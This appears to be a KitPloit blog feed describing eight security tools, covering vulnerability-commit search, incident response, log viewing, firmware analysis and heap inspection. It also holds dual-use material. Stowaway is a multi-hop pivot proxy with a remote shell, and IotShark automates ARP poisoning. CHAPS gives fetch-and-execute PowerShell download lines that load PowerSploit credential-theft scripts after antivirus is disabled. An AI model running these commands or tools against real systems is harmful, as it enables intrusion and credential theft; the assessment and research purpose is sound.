Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5840 articles
Browse latest View live

Git-Vuln-Finder - Finding Potential Software Vulnerabilities From Git Commit Messages

January 8, 2020, 12:35 pm
$
0
0

Finding potential software vulnerabilities from git commit messages. The output format is a JSON with the associated commit which could contain a fix regarding a software vulnerability. The search is based on a set of regular expressions against the commit messages only. If CVE IDs are present, those are added automatically in the output.

Requirements
  • Python 3.6
  • GitPython
  • langdetect

Usage
usage: finder.py [-h] [-v] [-r R] [-o O] [-s S] [-p P] [-c] [-t]

Finding potential software vulnerabilities from git commit messages.

optional arguments:
  -h, --help  show this help message and exit
  -v          increase output verbosity
  -r R        git repository to analyse
  -o O        Output format: [json]
  -s S        State of the commit found
  -p P        Matching pattern to use: [vulnpatterns, cryptopatterns,
              cpatterns] - the pattern 'all' is used to match all the patterns
              at once.
  -c          output only a list of the CVE pattern found in commit messages
              (disable by default)
  -t          Include tags matching a specific commit

More info: https://github.com/cve-search/git-vuln-finder

Patterns
git-vuln-finder comes with 3 default patterns which can be selected to find the potential vulnerabilities described in the commit messages such as:
  • vulnpatterns is a generic vulnerability pattern especially targeting web application and generic security commit message. Based on an academic paper.
  • cryptopatterns is a vulnerability pattern for cryptographic errors mentioned in commit messages.
  • cpatterns is a set of standard vulnerability patterns see for C/C++-like languages.

A sample partial output from Curl git repository
python3 finder.py -r /home/adulau/git/curl | jq .
...
 "6df916d751e72fc9a1febc07bb59c4ddd886c043": {
    "message": "loadlibrary: Only load system DLLs from the system directory\n\nInspiration provided by: Daniel Stenberg and Ray Satiro\n\nBug: https://curl.haxx.se/docs/adv_20160530.html\n\nRef: Windows DLL hijacking with curl, CVE-2016-4802\n",
    "language": "en",
    "commit-id": "6df916d751e72fc9a1febc07bb59c4ddd886c043",
    "summary": "loadlibrary: Only load system DLLs from the system directory",
    "stats": {
      "insertions": 180,
      "deletions": 8,
      "lines": 188,
      "files": 7
    },
    "author": "Steve Holme",
    "author-email": "steve_holme@hotmail.com",
    "authored_date": 1464555460,
    "committed_date": 1464588867,
    "branches": [
      "master"
    ],
    "pa   ttern-selected": "(?i)(denial of service |\bXXE\b|remote code execution|\bopen redirect|OSVDB|\bvuln|\bCVE\b |\bXSS\b|\bReDoS\b|\bNVD\b|malicious|x−frame−options|attack|cross site |exploit|malicious|directory traversal |\bRCE\b|\bdos\b|\bXSRF \b|\bXSS\b|clickjack|session.fixation|hijack|\badvisory|\binsecure |security |\bcross−origin\b|unauthori[z|s]ed |infinite loop)",
    "pattern-matches": [
      "hijack"
    ],
    "origin": "git@github.com:curl/curl.git",
    "origin-github-api": "https://api.github.com/repos/curl/curl/commits/6df916d751e72fc9a1febc07bb59c4ddd886c043",
    "tags": [],
    "cve": [
      "CVE-2016-4802"
    ],
    "state": "cve-assigned"
  },
  "c2b3f264cb5210f82bdc84a3b89250a611b68dd3": {
    "message": "CONNECT_ONLY: don't close connection on GSS 401/407 reponses\n\nPreviously, connections were closed immediately before the user had a\nchance to extract the socket when the proxy required Ne   gotiate\nauthentication.\n\nThis regression was brought in with the security fix in commit\n79b9d5f1a42578f\n\nCloses #655\n",
    "language": "en",
    "commit-id": "c2b3f264cb5210f82bdc84a3b89250a611b68dd3",
    "summary": "CONNECT_ONLY: don't close connection on GSS 401/407 reponses",
    "stats": {
      "insertions": 4,
      "deletions": 2,
      "lines": 6,
      "files": 1
    },
    "author": "Marcel Raad",
    "author-email": "raad@teamviewer.com",
    "authored_date": 1455523116,
    "committed_date": 1461704516,
    "branches": [
      "master"
    ],
    "pattern-selected": "(?i)(denial of service |\bXXE\b|remote code execution|\bopen redirect|OSVDB|\bvuln|\bCVE\b |\bXSS\b|\bReDoS\b|\bNVD\b|malicious|x−frame−options|attack|cross site |exploit|malicious|directory traversal |\bRCE\b|\bdos\b|\bXSRF \b|\bXSS\b|clickjack|session.fixation|hijack|\badvisory|\binsecure |security |\bcross−origi   n\b|unauthori[z|s]ed |infinite loop)",
    "pattern-matches": [
      "security "
    ],
    "origin": "git@github.com:curl/curl.git",
    "origin-github-api": "https://api.github.com/repos/curl/curl/commits/c2b3f264cb5210f82bdc84a3b89250a611b68dd3",
    "tags": [],
    "state": "under-review"
  },
...
  • Extracting CVE id(s) from git messages
  "98d132cf6a879faf0147aa83ea0c07ff326260ed": {
    "message": "Add a macro for testing assertion in both debug and production builds\n\nIf we have an assert then in a debug build we want an abort() to occur.\nIn a production build we wan
t the function to return an error.\n\nThis introduces a new macro to assist with that. The idea is to replace\nexisting use of OPENSSL_assert() with this new macro. The problem with\nOPENSSL
_assert() is that it aborts() on an assertion failure in both debug\nand production builds. It should never be a library's decision to abort a\nprocess (we don't get to decide when to kill t
he life support machine or\nthe nuclear reactor control system). Additionally if an attacker can\ncause a reachable assert to be hit then this can be a source of DoS attacks\ne.g. see CVE-20
17-3733, CVE-2015-0293, CVE-2011-4577 and CVE-2002-1568.\n\nReviewed-by: Tim Hudson <tjh@openssl.org>\n(Merged from https://github.com/openssl/o   penssl/pull/3496)",
    "commit-id": "98d132cf6a879faf0147aa83ea0c07ff326260ed",
    "summary": "Add a macro for testing assertion in both debug and production builds",
    "stats": {
      "insertions": 18,
      "deletions": 0,
      "lines": 18,
      "files": 1
    },
    "author": "Matt Caswell",
    "author-email": "matt@openssl.org",
    "authored_date": 1495182637,
    "committed_date": 1495457671,
    "branches": [
      "master"
    ],
    "pattern-selected": "(?i)(denial of service |\bXXE\b|remote code execution|\bopen redirect|OSVDB|\bvuln|\bCVE\b |\bXSS\b|\bReDoS\b|\bNVD\b|malicious|x−frame−options|attack|cross site |ex
ploit|malicious|directory traversal |\bRCE\b|\bdos\b|\bXSRF \b|\bXSS\b|clickjack|session.fixation|hijack|\badvisory|\binsecure |security |\bcross−origin\b|unauthori[z|s]ed |infinite loop)",
    "pattern-matches": [
      "attack"
    ],
    "cve": [
         "CVE-2017-3733",
      "CVE-2015-0293",
      "CVE-2011-4577",
      "CVE-2002-1568"
    ],
    "state": "cve-assigned"
  }

Acknowledgment
  • Thanks to Jean-Louis Huynen for the discussions about the crypto vulnerability pattern
  • Thanks to Sebastien Tricaud for the discussions regarding native language and commit messages

References


Search

Stowaway - Multi-hop Proxy Tool For Pentesters

January 9, 2020, 3:30 am
$
0
0

Stowaway is Multi-hop proxy tool for security researchers and pentesters
Users can easily proxy their network traffic to intranet nodes (multi-layer)
PS: The files under demo folder are Stowaway's beta version,it's still functional, you can check the detail by README.md file under the demo folder
This tool is limited to security research and teaching, and the user bears all legal and related responsibilities caused by the use of this tool! The author does not assume any legal and related responsibilities!

Features
  • obvious node topology
  • multi-hop socks5 traffic proxy
  • multi-hop ssh traffic proxy
  • remote interactive shell
  • network traffic encryption with AES-256(CBC mode)
  • support macos and linux

Usage

Stowaway can be excuted as two kinds of mode: admin && agent
If you don't want to compile the project by yourself, you can check the release folder to get ONE!
Simple example:
  Admin mode:./stowaway admin -l 9999 -s 123

  Meaning:

  admin  It means Stowaway is started as admin mode

  -l     It means Stowaway is listening on port 9999 and waiting for incoming connection

  -s     It means Stowaway has used 123 as the encrypt key during the communication

  Be aware! -s option's value must be as same as the agents' 

  For now, there are only three options above are supported!

  agent mode: ./stowaway agent -m 127.0.0.1:9999 -l 10000 --startnode -s 123 -r

  Meaning:

  agent It means Stowaway is started as agent mode 

  -m    It means Stowaway's monitor node's address (In this case,it's the node we started above)

  -l    It means Stowaway is listening on port 10000 and waiting for incoming connection 

  -s    It means Stowaway has used 123 as the encrypt key during the communication 

  --startnode  It means Stowaway is started as FIRST agent node(if the node is the first one , you MUST add this option!!! And there are two submode of agent mode,if you want to start the second, third one....., just remove this option)

  -r It means you want to start the node in reverse mode(For instance: you can add node 2 into the net via node 1 actively connect to node 2, instead of node 1 just waiting for the connection from node 2 )

  Be aware! -s option's value must be as same as the agents' 

 For now, there are only five options above are supported!
Example
For instance(one admin;one startnode;two simple nodes)
Admin

Startnode

First simple Node (setting as reverse mode)

Now, use admin and type in "use 1" -> "connect 127.0.0.1:10001" ,then you can add node 1 into the net
Second simple Node

When all agent nodes connected,check the topology in admin

Now we manipulate the second simple node through admin

Open the remote interactive shell

Now you can use interactive shell (the second simple node's) through admin
Start socks5 proxy service

Now you can use the admin's port 7777 as the socks5 proxy service
And it can proxy your traffic to the second simple node and the second simple node will do its work as socks server( When you want to shut down this socks5 service, just type in "stopsocks" under this mode to turn off it)
Open ssh

And it can proxy your ssh traffic to the second simple node and the second simple node will do its work as ssh cilent
PS: In this function,you can type in pwd to check where you currently are
For more detail, just type help to get further informations

Attention
  • This porject is coding just for fun , the logic structure and code structure are not strict enough, please don't be so serious about it
  • When the admin offline, all agent nodes will offline too(maybe it will be changed in future)
  • When one of the agents offline, the agent nodes after it will offline
  • Once the admin started, you need to connect at least one agent node to it before you do any operations
  • If you want to compile this project for supporting more platform, you can use go build -ldflags="-w -s" to do that
  • Temporarily does not support Windows

Thanks

TuxResponse - Linux Incident Response

January 9, 2020, 12:50 pm
$
0
0

TuxResponse is incident response script for linux systems written in bash. It can automate incident response activities on Linux systems and enable you to triage systems quickly, while not compromising with the results. Usually corporate systems would have some kind of monitoring and control, but there are exceptions due to shadow IT and non-standard images deployed in corps. What amounts to typing of 10 commands with trial end testing, can be done in a press of a button.

Tested on:
  • Ubuntu 14+
  • CentOS 7+
Primary purpose:
  • Take advantage of built-in tools and functionality in Linux (tools like dd, awk, grep, cat, netstat, etc)
  • Reduce the amount of commands incident responder needs to remember/use in response scenario.
  • Automation
External tools in the package:
  • LiME
  • Exif
  • Chckrootkit
  • Yara + Linux scanning rules (needs network to fetch the repo)

Example automation:
INSTALL LiME
function init_lime(){

  if [ -f /usr/bin/yum ]; then
    yum -y install make kernel-headers kernel-devel gcc
  elif [ -f /usr/bin/apt-get ]; then
    apt-add-repository universe
    apt-get -y install make linux-headers-$(uname -r) gcc
  fi

  rm -f /tmp/v1.8.1.zip
  wget -P/tmp https://github.com/504ensicsLabs/LiME/archive/v1.8.1.zip
  unzip /tmp/v1.8.1.zip
  rm -f /tmp/v1.8.1.zip

  pushd LiME-1.8.1/src
    make
    mv lime-*.ko /tmp/lime.ko
  popd
  rm -rf LiME-1.8.1
}
When responding to incidents, if you have to install LiME by manually typing all the commands, that will slow you down significantly.

Functionality

1) Live Response

1) Footprint System
   1)System info, IP, Date, Time, local TZ, last boot - 'hostnamectl; who -b; uname -a; uptime; ifconfig; date; last reboot'

2) File System Tools
    1)Check mounted filesystems -'df -h'
    2)Hash executables (MD5) - 'find /usr/bin -type f -exec file "{}" \; | grep -i "elf" | cut -f1 -d: | xargs -I "{}" -n 1 md5sum {}'
    3)Modified files - 'modified_files_period_select' (calling a function in tuxresponse.sh)
    4)List all hidden directories - 'find / -type d -name "\.*"'
    5)Files/dirs with no user/group name - 'find / \( -nouser -o -nogroup \) -exec ls -l {} \; 2>/dev/null'
    6)Changed files from packages -'packaged_files_changed' (calling a function in tuxresponse.sh)

3) YARA, CHKROOTKIT, EXIFTool
      1) Check for rootkits - runs 'chkrootkit'
      2) Yara scan - calling a function tuxresponse.sh 'yara_select' (scans system with all YARA linux rules available in master repo)
      3) EXIFTool - calling a function tuxresponse.sh 'exiftool_select' (installs EXIFTool)

4) Process Analysis Tools
      1) List running processes - 'ps -axu'
      2) Deleted binaries still running - 'ls -alR /proc/*/exe 2> /dev/null | grep deleted'
      3) Active Network Connections (TCP, UDP) - 'ss -tunap | sed "s/[ \t]\+/|/g"'
      4) Dump process based on PID - 'dump_process_select' (calling a function in tuxresponse.sh)
          1) Enter PID to dump: **(this is the command executed - gcore -a -o "${DUMP_FILE}" ${DUMP_PID} )**
      5) Process running from /tmp, /dev - 'ls -alR /proc/*/cwd 2> /dev/null | grep -E "tmp|dev"'

5) Network Connections Analysis
      1) List all active network connections/raw sockets - 'netstat -nalp; netstat -plant'

6) Users
      1) List all users connected to the system - 'w' 
      2) Get users with passwords - 'getent passwd'

7) Bash
      1) Check bash history file - 'cat ~/.bash_history | nl'

8) Evidence Of Persistence
      1) List All Cron Jobs - 'list_all_crontab' (calling a function in tuxresponse.sh)
      2) List All on-startup/boot programs - 'list_all_onstartup' (calling a function in tuxresponse.sh)

9) Dump All Logs (/var/log)
      1) Dump Users .bash_history - 'cat_all_bash_history' (calling a function in tuxresponse.sh)
      2) Find logs with binary inside -  'grep [[:cntrl:]] /var/log/*.log'

2) Connect To Target - use SSH to transfer script and analyze remote system.
      That option enables you to connect to a remote system, copy over all scripts and tools and analyze the system.

3) Take Memory Dump (LKM LiME)
      That option enables you to compile LiME from source and dump the RAM memory off the system. This is the easiest way to do it as the other way around would be to compile from source for all major kernel versions and insert the LKM.

4) Take disk image (DD)
That option enables you to do a full disk image of the target system using well-known tool - dd. The function is taking source and destination as parameters and inserts them in the following command 'dd if=${IMAGE_IN} | pv | dd of='${IMAGE_OUT}' bs=4K conv=noerror,sync'. If you're investigating remote system, the script is going to copy itself there. Then if the parameter ${TARGET_HOST} is set, then the script is going to download the image to analyst system using this command >> "ssh -p${TARGET_PORT} ${TARGET_USER}@${TARGET_HOST} 'dd if=${IMAGE_IN} bs=4K conv=noerror,sync' | pv | dd of='${IMAGE_OUT}'" (im heavily using pv to make sure progress is tracked)

5) Generate HTML Report
Everything you do is recorded in text files, thus easy to go back and look at the output. The beauty of this is that you can upload it in your favourite log analysis tools and make sense of it at later stage. On top of that, you can use that function to generate HTML report and look at the command-generated output in a more human readable form.

6) Install Software
      Install binaries that are required by the script to function correctly.
      1) Dependancies
      2) Yara and rules
      3) ExifTool
      4) Init check
      5) chckrootkit
      6) LiME


LNAV - Log File Navigator

January 10, 2020, 4:30 am
$
0
0

The log file navigator, lnav, is an enhanced log file viewer that takes advantage of any semantic information that can be gleaned from the files being viewed, such as timestamps and log levels. Using this extra semantic information, lnav can do things like interleaving messages from different files, generate histograms of messages over time, and providing hotkeys for navigating through the file. It is hoped that these features will allow the user to quickly and efficiently zero in on problems.

Prerequisites
The following software packages are required to build lnav:
  • gcc/clang - A C++14-compatible compiler.
  • libpcre - The Perl Compatible Regular Expression (PCRE) library.
  • sqlite - The SQLite database engine. Version 3.9.0 or higher is required.
  • ncurses - The ncurses text UI library.
  • readline - The readline line editing library.
  • zlib - The zlib compression library.
  • bz2 - The bzip2 compression library.
  • libcurl - The cURL library for downloading files from URLs. Version 7.23.0 or higher is required.

Installation
Lnav follows the usual GNU style for configuring and installing software:
$ ./configure
$ make
$ sudo make install
Run ./autogen.sh before running any of the above commands when compiling from a cloned repository.

Cygwin users
It should compile fine in Cygwin.
Alternatively, you can get the generated binary from AppVeyor artifacts.
Remember that you still need the lnav dependencies under Cygwin, here is a quick way to do it:
setup-x86_64.exe -q -P libpcre1 -P libpcrecpp0 -P libsqlite3_0 -P libstdc++6
Currently, the x64 version seems to be working better than the x86 one.

Usage
The only file installed is the executable, lnav. You can execute it with no arguments to view the default set of files:
$ lnav
You can view all the syslog messages by running:
$ lnav /var/log/messages*

Usage with systemd-journald
On systems running systemd-journald, you can use lnav as the pager:
$ journalctl | lnav
or in follow mode:
$ journalctl -f | lnav
Since journalctl's default output format omits the year, if you are viewing logs which span multiple years you will need to change the output format to include the year, otherwise lnav gets confused:
$ journalctl -o short-iso | lnav
It is also possible to use journalctl's json output format and lnav will make use of additional fields such as PRIORITY and _SYSTEMD_UNIT:
$ journalctl -o json | lnav
In case some MESSAGE fields contain special characters such as ANSI color codes which are considered as unprintable by journalctl, specifying journalctl's -a option might be preferable in order to output those messages still in a non binary representation:
$ journalctl -a -o json | lnav
If using systemd v236 or newer, the output fields can be limited to the ones actually recognized by lnav for increased efficiency:
$ journalctl -o json --output-fields=MESSAGE,PRIORITY,_PID,SYSLOG_IDENTIFIER,_SYSTEMD_UNIT | lnav
If your system has been running for a long time, for increased efficiency you may want to limit the number of log lines fed into lnav, e.g. via journalctl's -n or --since=... options.
In case of a persistent journal, you may want to limit the number of log lines fed into lnav via journalctl's -b option.

See Also
The lnav website can be found at:
http://lnav.org
Angle-grinder is a tool to slice and dice log files on the command-line. If you're familiar with the SumoLogic query language, you might find this tool more comfortable to work with.


IotShark - Monitoring And Analyzing IoT Traffic

January 10, 2020, 1:01 pm
$
0
0

IoTShark is a IOT monitoring service that allows users to monitor their IOT devices for trends in data sent/received. Ordinarily, setting up a man in the middle attack with proper configurations can take up quite a bit of time, and may seem dauntingly impossible for those with little to no experience in computer security or even computer science.
IoTShark aims to provide a [nearly] fully automated solution for a user to monitor their IOT devices by simply running a single script. The user merely has to select which device they wish to monitor, and this program takes care of the rest of the heavy work by starting the ARP poisoning, setting up the packet forwarding and the man in the middle packet sniffer. It also has an easy to understand and interactive web UI where a user can filter the packets based on the ports, types, and timestamps to get a broader understanding of how much and when things are being transmitted.
We also aim to classify certain kinds of data such as heartbeat messages, data transfers, and anomalies, though the last one will likely be demonstrated on the un-encrypted RPi test since it is difficult to do anomaly detection without huge amounts of data (and we would require many devices and individuals to gather that much data).

How to run:
  1. Install the required libraries: $pip3 -r requirements.txt
  2. Set up the ip forwarding: $sudo sysctl net.inet.ip.forwarding=1
  3. Run the app: sudo python3 mitm_main.py

The Main Script
Create a Python virtual envionment and install dependency packages.
virtualenv --python=`which python3` venv
source venv/bin/activate
python -r requirements.txt
Make sure packet forwarding is enabled on your local machine. This is necessary for man-in-the-middle attack to work. On macOS this can be done with:
sudo sysctl net.inet.ip.forwarding=1
Run the main program mitm_main.py. See that script for accepted options.
Currently this program does three things:
  1. Scan for all hosts either in the given subnet by the -s option or a set of common residential subnets
  2. Discover the hardware vendor and OS of each host
  3. Perform ARP poisoning between the selected host and gateway router
  4. Output graphs of past captured data by the -f option followed by relative path to csv file
After ARP poisoning is running, you can examine traffic from the target device by Wireshark with a display filter like:
(ip.src==192.168.0.215 or ip.dst==192.168.0.215) and tcp.port != 443

Data File Format
The captured data is stored in a csv file with the following format:
{timestamp, incoming_bytes, outgoing_bytes, srcport, dstport, transfer_protocol, connection_protocol, srcip, dstip}
123123213, 0, 240, 36, 80, 65124, HTTP, UDP, 192.168.0.215, 104.24.4.5  123123240, 300, 0, 800, 443, 65125, HTTPS, TCP, 104.24.4.5, 192.168.0.215

Using the Tool to Sniff IoT Devices
For example, here is a long string that we can say to Alexa Echo Dot/Google Home while sniffing their traffic. Pay attention if the device is transmitting data before the wake word.
123123213, 0, 240, 36, 80, 65124, HTTP, UDP, 192.168.0.215, 104.24.4.5
123123240, 300, 0, 800, 443, 65125, HTTPS, TCP, 104.24.4.5, 192.168.0.215


Karonte - A Static Analysis Tool To Detect Multi-Binary Vulnerabilities In Embedded Firmware

January 11, 2020, 3:30 am
$
0
0

Karonte is a static analysis tool to detect multi-binary vulnerabilities in embedded firmware.

Research paper
We present our approach and the findings of this work in the following research paper:
KARONTE: Detecting Insecure Multi-binary Interactions in Embedded Firmware[PDF]
Nilo Redini, Aravind Machiry, Ruoyu Wang, Chad Spensky, Andrea Continella, Yan Shoshitaishvili, Christopher Kruegel, Giovanni Vigna. To appear in Proceedings of the IEEE Symposium on Security & Privacy (S&P), May 2020
If you use Karonte in a scientific publication, we would appreciate citations using this Bibtex entry:
@inproceedings{redini_karonte_20,
 author    = {Nilo Redini and Aravind Machiry and Ruoyu Wang and Chad Spensky and Andrea Continella and Yan Shoshitaishvili and Christopher Kruegel and Giovanni Vigna},
 booktitle = {To appear in Proceedings of the IEEE Symposium on Security & Privacy (S&P)},
 month     = {May},
 title     = {KARONTE: Detecting Insecure Multi-binary Interactions in Embedded Firmware},
 year      = {2020}
}

Repository Structure
There are four main directories:
  • tool: karonte python files
  • firmware: karonte firmware dataset
  • configs: configuration files to analyze the firmware samples in the dataset
  • eval: scripts to run the various evaluations on karonte

Run Karonte
To run karonte, from the root directory, just run
SYNOPSIS      python tool/karonte.py JSON_CONFIG_FILE [LOG_NAME]
DESCRIPTION     runs karonte on the firmware sample represented by the JSON_CONFIG_FILE, and save the results in LOG_NAME
EXAMPLE     python tool/karonte.py config/NETGEAR/r_7800.json      It runs karonte on the R7800 NETGEAR firmware
By default, results are saved in /tmp/ with the suffix Karonte.txt.
To inspect the generated alerts, just run:
      python tool/pretty_print.py LOG_NAME

Docker
A dockerized version of Karonte ready to use can be found here

Dataset
You can obtain Karonte dataset at this link


CHAPS - Configuration Hardening Assessment PowerShell Script

January 11, 2020, 1:08 pm
$
0
0

CHAPS is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed. The purpose of this script is to run it on a server or workstation to collect configuration information about that system. The information collected can then be used to provide recommendations (and references) to improve the security of the individual system and systemic issues within the organization's Windows environment. Examples of environments where this script is useful include Industrial Control System (ICS) environments where systems cannot be modified. These systems include Engineer / Operator workstations, Human Machine Interface (HMI) systems, and management servers that are deployed in production environments.
This script is NOT intended to be a replacement for Microsoft's Policy Analyzer. The best way to audit a system's configuration is to use the Microsoft Security Compliance Toolkit and Policy Analyzer with a Windows Workstation Security Baseline GPO. The Policy Analyzer's output can be exported an MS Excel file, but it requires the Microsoft Excel is installed on the system. Cut and pasting this information does work, but might not be an option on a physical system. Also, using the Policy Analyzer requires installation of the Windows software, which may not be permitted.
This script runs in PowerShell and should be PowerShell-version independent. Some checks may fail depending on the Windows version, system configurations, and whether or not it is run with Administrator privileges. Instances where commands did not run successfully are noted and should be manually investigated where possible.
This script was developed using information from several sources (noted in Useful Resources section) to identify recommended security configurations to reduce the likelihood of a compromised system and to log user events conducted on the system. It pulls heavily from the Securing Windows Workstations baseline outlined by Sean Metcalf.

How To Use
The best way to run this script within an ICS environment is to not write any programs or scripts to the system being reviewed. Do this by serving these scripts from a webserver running on another system on the network. Download CHAPS and PowerSploit into the same directory and open a terminal and change into that directory. Using Python3 run the command 'python3 -m http.server 8181'. This will start a webserver listening on all of the systems IP addresses.
On the target system open a CMD.exe window, preferably as an Administrator. Run the command powershell.exe -exec bypass to being a PowerShell prompt. From this prompt, run the following command to execute the chaps.ps1 script.
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/chaps/chaps.ps1')
To run the chaps-powershell.ps1 script be sure to turn off the system's Anti-virus to include real-time protection. Running the following commands will import the appropriate PowerSploit scripts and then run them.
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/PowerSploit/Recon/PowerView.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/PowerSploit/Exfiltration/Get-GPPPassword.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/PowerSploit/Exfiltration/Get-GPPAutologon.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/PowerSploit/Exfiltration/Get-VaultCredential.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/PowerSploit/Privesc/PowerUp.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<webserver>:8181/chaps/chaps-powersploit.ps1')
Each script's outputs will be written to the user's Temp directory as defined by the $env:temp variable. Copy these files off of the system being reviewed, delete them, and, if necessary, restart the system's anti-virus.

System Configuration Checks

System Info Command

System Information
  • Administrator rights
    • This check determines if the user running the script has administrator rights. Some checks may not work without admin rights. Most of the checks will work, unless some security controls or configurations prevent it.
    • There is an error suppression line that has been disabled. Uncomment the line to suppress all errors. The "-ErrorAction SilentlyContinue" has also been used on some of the commands within the script.
  • System information
    • System Version
    • User and Path Information
    • System IPv4 addresses.
    • System IPv6 addresses.
    • Windows AutoUpdate configuration.
    • Check for missing Critical and Important Updates
    • Check for BitLocker Disk Encryption
    • Check AlwaysInstallElevated Registry Keys
  • PowerShell Event Log Settings
    • Determine if PowerShell Commandline Auditing is Enabled.
    • Determine if PowerShell Module Logging is Enabled.
    • Determine if PowerShell Script Block and Invocation Logging is Enabled.
    • Determine if PowerShell PowerShell Invocation Header Logging is Enabled.
    • Determine if PowerShell Protected Event Logging is Enabled.
  • Windows Event Log Configurations
    • Check the maximum log file settings for critical logs:
    • Application
    • System
    • Security
    • Windows PowerShell
    • Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
    • Microsoft-Windows-TaskScheduler/Operational
    • Microsoft-Windows-SMBServer/Audit
    • Microsoft-Windows-Security-Netlogon/Operational
    • Microsoft-Windows-WinRM/Operational
    • Microsoft-Windows-WMI-Activity/Operational
  • PowerShell Configuration Settings
    • Version of default PowerShell
    • Check if PowerShell version 2 is permitted.
    • Determine installed versions of .NET to determine if they support PowerShell version 2.
    • Determine if PowerShell Language Mode is "ConstratinedLanguage".
  • Cached Credentials
    • Check how many Cached Credentials the system is configured to maintain.
  • Remote Access Configurations
    • Determine if RDP is configured to permit remote connections.
      • Check the setting of AllowRemoteRPC.
      • Check the setting of fDenyTSConnections.
  • Understand WinRM configuration.
    • Test if the WinRM Service is running using two different methods.
    • Check the Windows Firewall configuration to see if the rules to permit WinRM are enabled.
  • Local Administrator Accounts
    • Determine if more than one user is a member of the Local Administrator group.

CHAPS PowerSploit Security Checks
The PowerSploit project (dev branch) can be used to gather additional information about the system. The chaps-powersploit.ps1 script has been developed to gather this information. Of course, most anti-malware programs will prevent, protect, and alert on the use of PowerSploit. Therefore, the anti-malware should be disabled or the chaps-powersploit.ps1 script should not be used, NOTE: anti-malware programs should be re-enabled immediately upon verification that the script ran correctly.

chaps-powersploit.ps1 TODO:
Here are a list of things that aren't working, need to be addressed, or are possible function requests.
  • Needs to be tested in a Domain environment.
  • Handle errors gracefully.
  • Identify new cmdlets to run, such as Find-InterestingFiles with a list of specific files related to ICS project files.

Secure Baseline Checks - Securing Windows Workstations
  • Check AppLocker
    • Determine if AppLocker is configured to monitor scripts, at a minimum.
  • Check EMET
    • If version is less than Windows 10, check that EMET service is running.
  • Deploy LAPS
    • Determine if LAPS is installed. NOTE: not checking if it is configured or used.
  • Force Group Policy to reapply settings during “refresh”
    • Determine how NoGPOListChanges is configured to see if GPOs are allied everytime they are checked.
  • Disable Net Session Enumeration
  • Disable WPAD
    • Check for a WPAD entry in the Windows "etc\hosts" file.
    • Check for the WpadOverride registry key.
    • Determine if the WinHTTPAutoProxySvc is running.
    • Check if the Windows Hotfix KB3165191 is installed.
    • Check WINS configuration.
    • Determine network adapter configurations for:
      • DNSEnabledForWINSResolution
      • WINSEnableLMHostsLookup
  • Disable LLMNR
    • Detemine if DNSClient.EnableMulticast is disabled.
  • Disable Windows Browser Protocol
    • Determine if the Computer Browser service is running.
  • Disable NetBIOS
    • Check the setting of TcpipNetbiosOptions to determine if it is disabled.
  • Disable Windows Scripting
    • Check if Windows Scripting Host registry key is enabled.
    • Check if Windows Hotfix KB2871997 is installed.
    • NOTE: not sure how to check "Control Scripting File Extensions"
  • Prevent Interactive Login
    • Check the configuration of registry key LocalAccountTokenFilterPolicy to see if it is disabled.
  • Disable WDigest
    • Check the configuration of registry key WDigest.UseLogonCredential to determine if it is disabled.
  • Disable SMBv1
    • Use Get-SmbServerConfiguration to check:
      • If SMBv1 is disabled.
      • If SMBv1 auditing is enabled.
  • Block Untrusted Fonts on Windows 10
    • Check the registry key Kernel.MitigationOptions to determine if it is configured to block untrusted fonts.
  • Enable Credential / Device Guard on Windows 10
    • Check if the Credential Guard or HVCI service is running. NOTE: not checking configuration settings.
    • Check if Device Guard is configured. NOTE: not checking configuration settings.
  • Secure LanMan Authentication
    • Check if the registry key Lsa.NoLmHash is enabled.
    • Check if the registry key Lsa.LmCompatibilityLevel is configured to "Send NTLMv2 response only. Refuse LM & NTLM."
    • Check if Anonymous Enumeration of domain is restricted.
    • Check if Anonymous Enumeration of local system is restricted.
  • Secure Microsoft Office
    • Not implemented at this time.
  • Restrict RPC Clients
    • Determine if remote RPC client access is restricted.
  • Configure NTLM session security
    • Check NTLM Session Server Security settings to determine if it requires NTLMv2 and 128-bit encryption.
    • Check NTLM Session Client Security settings to determine if it requires NTLMv2 and 128-bit encryption.

CHAPS TODO:
Here are a list of things that aren't working, need to be addressed, or are possible function requests.
  • Issues
    • WMI remoting and firewall rules may be required by Vulnerability scanning tools. Thus, if enabled, test for limiting to users and specific systems.
    • Fix PowerShell version 2 check
    • Fix .NET version check.
      • (Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse -Error Action 0| Get-ItemProperty -Name Version -ErrorAction 0) | Select-Object Version
  • Useful
    • Generate lines for reporting.
      • Marked so another script can scan the result and build finding and recommendation sections for a report.
    • Check for SYSMON Program.
    • Update checks so that they are Windows version specific. E.G. Windows 10, Windows 7, Windows 2018.
    • List Installed Programs (to include x86) and programs installed directly to C: drive
    • Detect and acquire version information for JAVA, flash, and Adobe.
  • Nice-To-Haves
    • Update with Domain tests, as a user specified option.
    • CMD-only (non-PowerShell) version.
    • Add checks from Carlos Perez's HoneyBadger plugin. Must be converted from Ruby to PowerShell.

Useful Resources:

Heapinspect - Inspect Heap In Python

January 12, 2020, 3:30 am
$
0
0

HeapInspect is designed to make heap much more prettier.
Now this tool is a plugin of nadbg. Try it!

Features
  • Free of gdb and other requirement
  • Multi glibc support
    • 2.19, 2.23-2.27 (currently tested)
    • both 32bit and 64bit
  • Nice UI to show heap
    • HeapShower (detailed)
    • PrettyPrinter (colorful, summary)
  • Heapdiff (working)
  • Corruption detect & exploit analysis (working)
  • Also support gdb (python2 only) :)

Usage

Quick shot
A quick use of this tool.





You can also use it as a gdb plugin, very useful when pwndbg or other plugins failed to analysis heap.
sed -i "1i source `pwd`/gdbscript.py" ~/.gdbinit # alternatively, you can add that line manually
Note
HeapInspect does not support gdb python3 for now. Anyone who can make it python3 compatible are welcome.




Basic
Pretty easy to use. I will make it a package later.
from heapinspect.core import *
hi = HeapInspect(1234)       #pid here
hs = HeapShower(hi)

print(hs.fastbins)
print(hs.smallbins)
print(hs.largebins)
print(hs.unsortedbins)
print(hs.tcache_chunks)

hs.relative = 1              #relative mode, check Quick shot
